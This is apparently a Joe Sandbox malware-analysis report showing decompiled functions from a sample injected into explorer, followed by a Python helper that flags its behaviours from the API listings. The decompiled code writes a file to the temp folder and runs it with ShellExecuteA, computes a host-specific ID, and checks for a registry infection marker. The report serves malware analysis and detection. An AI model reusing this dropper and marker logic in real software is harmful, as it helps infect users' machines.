    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00777D3C(void* __eax, void* __ecx, void* __edx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v85;
    				char _v342;
    				void* _t34;
    				intOrPtr _t42;
    				void* _t55;
    				intOrPtr _t58;
    
    				_t55 = __ecx;
    				_v8 = __eax;
    				_v342 = 0;
    				GetTempPathA(0x101,  &_v342);
    				_v12 = _v8;
    				_v16 = 0;
    				while(1) {
    					_t34 = _v12;
    					if( *_t34 == 0) {
    						break;
    					}
    					__eflags =  *_v12 - 0x2f;
    					if( *_v12 == 0x2f) {
    						_v16 = _v12;
    					}
    					_t10 =  &_v12;
    					 *_t10 = _v12 + 1;
    					__eflags =  *_t10;
    				}
    				if(_v16 != 0) {
    					_v16 = _v16 + 1;
    					E0077133C( &_v342, _v16);
    					if(E00773C28(_v8, _t55,  &_v342) == 0) {
    						_t42 =  *0x77a170; // 0x771e04
    						return E00777240(_t42, __eflags);
    					}
    					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5);
    					_v20 = _t34;
    					_t66 = _v20 - 0x20;
    					if(_v20 <= 0x20) {
    						E00771864(_v20,  &_v85);
    						_t58 =  *0x77a16c; // 0x771df8
    						E00771308( &_v342, _t58);
    						E0077133C( &_v342,  &_v85);
    						return E00777240( &_v342, _t66);
    					}
    				}
    				return _t34;
    			}

    0x00777d3c
    0x00777d45
    0x00777d48
    0x00777d5b
    0x00777d64
    0x00777d69
    0x00777d7f
    0x00777d7f
    0x00777d85
    0x00000000
    0x00000000
    0x00777d71
    0x00777d74
    0x00777d79
    0x00777d79
    0x00777d7c
    0x00777d7c
    0x00777d7c
    0x00777d7c
    0x00777d8b
    0x00777d91
    0x00777d9f
    0x00777db7
    0x00777e1a
    0x00000000
    0x00777e1f
    0x00777dca
    0x00777dd0
    0x00777dd3
    0x00777dd7
    0x00777de1
    0x00777def
    0x00777df5
    0x00777e05
    0x00000000
    0x00777e13
    0x00777dd7
    0x00777e27

    APIs
    • GetTempPathA.KERNEL32(00000101,00000000), ref: 00777D5B
      • Part of subcall function 00773C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00773E08
      • Part of subcall function 00773C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00773E55
      • Part of subcall function 00773C28: CloseHandle.KERNEL32(000000FF), ref: 00773E6B
    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 00777DCA
      • Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 92%
    			E00776900(intOrPtr __eax, void* __edx) {
    				intOrPtr _v8;
    				long _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				intOrPtr _v117;
    				char _v153;
    				char* _t30;
    				intOrPtr _t35;
    
    				asm("das");                                                   // this listing was decoded from 0x776900, four bytes before the function's real entry at 0x776904
    				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;      // (next listing, quality 100%); these three statements are an artefact of the misaligned start,
    				_v117 = _v117 + __edx;                                        // not code, and everything from _v8 = __eax on is identical to E00776904
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x81;
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v153),  &_v153);
    				}
    				_t30 =  *0x77a25c; // 0x772174
    				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24);
    				_v12 = 4;
    				_v20 = 0;
    				_t35 =  *0x77a0f0; // 0x771d3c
    				E007738B0(_v24, _t35, 0, 0,  &_v20,  &_v12);
    				E00773890(_v24);
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;
    				return E00771164(_v16, _v8);
    			}

    Instruction addresses, one per statement of the listing above: 0x00776900 0x00776901 0x00776903 0x0077690d 0x00776912 0x00776915 0x0077692f 0x0077694c 0x0077694c 0x0077695a 0x00776965 0x0077696b 0x00776974 0x00776983 0x0077698d 0x00776998 0x007769a8 0x007769b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00776927
    • RegOpenKeyExA.ADVAPI32(80000002,00772174,00000000,00020119,?), ref: 00776965
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00776904(intOrPtr __eax) {
    				intOrPtr _v8;
    				long _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				char _v153;
    				char* _t28;
    				intOrPtr _t33;
    
    				_v8 = __eax;                                                  // caller-supplied argument, handed on to E00771164 together with the result
    				_v16 = 0;
    				_v12 = 0x81;                                                  // 0x81 = size of the _v153 name buffer; _v12 is reused as cbData below
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v153),  &_v153);      // reduces the computer name to a 32-bit value (assumption from usage: E007712DC is its length)
    				}
    				_t28 =  *0x77a25c; // 0x772174
    				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24);         // HKEY_LOCAL_MACHINE, key name at 0x772174, 0x20119 = KEY_READ | KEY_WOW64_64KEY (64-bit view)
    				_v12 = 4;                                                     // cbData = sizeof(DWORD)
    				_v20 = 0;
    				_t33 =  *0x77a0f0; // 0x771d3c
    				E007738B0(_v24, _t33, 0, 0,  &_v20,  &_v12);                  // RegQueryValueExA of the value named at 0x771d3c into _v20 (see APIs)
    				E00773890(_v24);                                              // RegCloseKey
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;                              // host-specific 32-bit value: name-derived value XOR registry DWORD XOR constant
    				return E00771164(_v16, _v8);
    			}

    Instruction addresses, one per statement of the listing above: 0x0077690d 0x00776912 0x00776915 0x0077692f 0x0077694c 0x0077694c 0x0077695a 0x00776965 0x0077696b 0x00776974 0x00776983 0x0077698d 0x00776998 0x007769a8 0x007769b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00776927
    • RegOpenKeyExA.ADVAPI32(80000002,00772174,00000000,00020119,?), ref: 00776965
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 88%
    			E00773EA0() {
    				signed char _v8;
    				void* _v12;
    				char _v16;
    				char* _t13;
    				signed int _t18;
    				char* _t25;
    
    				if( *0x77a034 == 0) {                                                      // a global flag selects the hive
    					_t13 =  *0x77a260; // 0x7721a4
    					RegCreateKeyExA(0x80000001, _t13, 0, 0, 0, 0xf003f, 0,  &_v12, 0);     // HKEY_CURRENT_USER, key name at 0x7721a4, 0xf003f = KEY_ALL_ACCESS; creates the key if absent
    				} else {
    					_t25 =  *0x77a260; // 0x7721a4
    					RegCreateKeyExA(0x80000002, _t25, 0, 0, 0, 0xf003f, 0,  &_v12, 0);     // HKEY_LOCAL_MACHINE, same key name and access (needs elevation)
    				}
    				_v16 = 0;
    				_t18 = E007738B0(_v12, "ewhasskz", 0, 0, 0,  &_v16);                       // RegQueryValueExA with lpData = NULL: only asks for the size of value "ewhasskz"
    				asm("sbb eax, eax");
    				_v8 =  ~(_t18 & 0xffffff00 | _v16 != 0x00000000);                          // sbb-based boolean; the test that matters is _v16 != 0, i.e. the value exists
    				E00773890(_v12);                                                           // RegCloseKey
    				return _v8;
    			}

    Instruction addresses, one per statement of the listing above: 0x00773ead 0x00773ee8 0x00773ef3 0x00773eaf 0x00773ec2 0x00773ecd 0x00773ecd 0x00773efb 0x00773f11 0x00773f22 0x00773f24 0x00773f2a 0x00773f35

    APIs
    • RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773ECD
    • RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773EF3
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
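The "APIs" listings in this section can be triaged mechanically. The Python below is an added example, not part of the Joe Sandbox report, of Joe Sandbox itself or of the sample: it parses the bullet lines in the exact format printed above, decodes the Win32 constants that appear in the static arguments (HKEY roots, registry access masks including the KEY_WOW64_64KEY bit in 0x20119, GENERIC_WRITE, SW_SHOW) and flags two behaviours visible here, a file created for writing and later handed to ShellExecuteA, and a registry key opened or created and then probed for a value. The rule names, the `ApiCall`/`parse_listing`/`flag_behaviours` helpers and the findings format are the editor's; the sample input is copied from the three listings of this section.

```python
"""Triage helper for the "APIs" listings of a Joe Sandbox report. Added example, not
part of the report, of Joe Sandbox or of the sample: it parses the bullet lines as
printed above, decodes the Win32 constants in the static arguments and flags two
behaviours seen in this section. Rule names are the editor's; the sample input is
copied from the three listings of this section."""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w.]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # hex literal -> int; "?" (unknown statically) -> None
    ref: int                   # call-site address
    subcall: Optional[int]     # callee the call was attributed through, if any

def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # "APIs"/"Strings" headings and other non-call lines
        raw = (m["args"] or "").strip()
        args = [None if t.strip() == "?" else int(t, 16) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

# Win32 constants that occur in the listings above
GENERIC_WRITE = 0x40000000
HKEY_ROOTS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
NAMED_KEY_MASKS = {0xF003F: "KEY_ALL_ACCESS", 0x20019: "KEY_READ", 0x20006: "KEY_WRITE"}
KEY_WOW64_64KEY, KEY_WOW64_32KEY = 0x100, 0x200
SW_NAMES = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 2: "SW_SHOWMINIMIZED", 3: "SW_SHOWMAXIMIZED", 4: "SW_SHOWNOACTIVATE",
            5: "SW_SHOW", 6: "SW_MINIMIZE", 7: "SW_SHOWMINNOACTIVE", 8: "SW_SHOWNA", 9: "SW_RESTORE", 10: "SW_SHOWDEFAULT"}

def describe_access(mask: int) -> str:
    # Split off the WOW64 view bits so 0x20119 reads as KEY_READ|KEY_WOW64_64KEY, not as an odd number.
    base = mask & ~(KEY_WOW64_64KEY | KEY_WOW64_32KEY)
    parts = [NAMED_KEY_MASKS.get(base, hex(base))]
    if mask & KEY_WOW64_64KEY:
        parts.append("KEY_WOW64_64KEY")
    if mask & KEY_WOW64_32KEY:
        parts.append("KEY_WOW64_32KEY")
    return "|".join(parts)

def arg(call: ApiCall, i: int) -> Optional[int]:
    return call.args[i] if i < len(call.args) else None

def flag_behaviours(calls: List[ApiCall]) -> List[dict]:
    findings = []
    # Rule 1: CreateFileA asking for GENERIC_WRITE, then a ShellExecuteA. The listing alone does not
    # prove both use the same path; the decompiled code does (above, &_v342 goes to both), so confirm there.
    for i, c in enumerate(calls):
        access = arg(c, 1)
        if c.api == "CreateFileA" and access is not None and access & GENERIC_WRITE:
            later = next((x for x in calls[i + 1:] if x.api == "ShellExecuteA"), None)
            if later is not None:
                show = arg(later, 5)
                findings.append({"rule": "drop_and_execute", "write_ref": c.ref,
                                 "exec_ref": later.ref, "show_cmd": SW_NAMES.get(show, show)})
    # Rule 2: a key opened or created and then queried for a value. RegCreateKeyExA creates the key
    # when it is absent, so even a bare "is the marker there?" probe leaves a footprint telemetry can catch.
    for i, c in enumerate(calls):
        if c.api not in ("RegOpenKeyExA", "RegCreateKeyExA"):
            continue
        if not any(x.api == "RegQueryValueExA" for x in calls[i + 1:]):
            continue
        mask = arg(c, 3) if c.api == "RegOpenKeyExA" else arg(c, 5)
        root = arg(c, 0)
        findings.append({"rule": "registry_value_probe", "open_ref": c.ref,
                         "root": HKEY_ROOTS.get(root, "?" if root is None else hex(root)),
                         "access": "?" if mask is None else describe_access(mask),
                         "creates_key": c.api == "RegCreateKeyExA"})
    return findings

# Sample input: the three "APIs" listings of this section, copied verbatim.
LISTING_DROP = """\
• GetTempPathA.KERNEL32(00000101,00000000), ref: 00777D5B
  • Part of subcall function 00773C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00773E08
  • Part of subcall function 00773C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00773E55
  • Part of subcall function 00773C28: CloseHandle.KERNEL32(000000FF), ref: 00773E6B
• ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 00777DCA
  • Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874
"""
LISTING_HOSTKEY = """\
• GetComputerNameA.KERNEL32(?,?), ref: 00776927
• RegOpenKeyExA.ADVAPI32(80000002,00772174,00000000,00020119,?), ref: 00776965
  • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
  • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
"""
LISTING_MARKER = """\
• RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773ECD
• RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773EF3
  • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
  • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
"""
```

Running `flag_behaviours(parse_listing(LISTING_DROP))` yields one drop_and_execute finding (write at 0x773E08, ShellExecuteA at 0x777DCA, SW_SHOW); the HOSTKEY listing yields one registry_value_probe under HKEY_LOCAL_MACHINE with KEY_READ|KEY_WOW64_64KEY; the MARKER listing yields two probes, HKEY_LOCAL_MACHINE then HKEY_CURRENT_USER, both KEY_ALL_ACCESS and both able to create the key as a side effect. The 64-bit view flag is worth keeping in mind when reproducing the host check: a 32-bit process reading the same key without it would be redirected to the Wow6432Node copy.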